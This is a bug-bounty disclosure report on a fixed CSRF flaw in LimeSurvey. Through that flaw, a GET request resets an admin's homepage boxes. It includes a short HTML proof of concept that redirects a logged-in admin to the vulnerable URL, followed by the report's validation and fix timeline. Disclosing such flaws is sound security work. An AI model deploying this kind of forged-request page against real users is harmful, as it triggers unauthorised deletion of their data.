CSRF Leading to reset Boxes in limesurvey/limesurvey

Valid

Reported on

Apr 19th 2023

Description

Hello everyone,

During my testing on LimeSurvey's admin demo, it's found that the Boxes part of the application is vulnerable to CSRF affecting reset boxes functionality meaning that if an admin created some boxes an attacker could trick the admin to reset the boxes by following a link to an attacker-controlled page that submits the vulnerable GET request to reset the boxes, here is the vulnerable GET request:

https://demo.limesurvey.org/index.php?r=homepageSettings/resetAllBoxes

Proof of Concept

// csrf.html
<!DOCTYPE html>
<html>
<head>
    <script>
          
          window.onload = function() {

            window.location = 'https://demo.limesurvey.org/index.php?r=homepageSettings/resetAllBoxes';
          }

    </script>

</head>
<body>

    

</body>
</html>

Impact

the CSRF could trick the admin to reset the boxes meaning all his created boxes will be deleted !

We are processing your report and will contact the limesurvey team within 24 hours. 5 months ago

We have contacted a member of the limesurvey team and are waiting to hear back 5 months ago

Carsten Schmitz modified the Severity from Medium (6.5) to None (0) 5 months ago

Carsten Schmitz modified the Severity from None (0) to Medium (4.3) 5 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Carsten Schmitz validated this vulnerability 5 months ago

Moad Akhraz has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carsten Schmitz marked this as fixed in 6.1.5 with commit bc2bbb 3 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

This vulnerability is scheduled to go public on Jun 26th 2023

Carsten Schmitz published this vulnerability 3 months ago

to join this conversation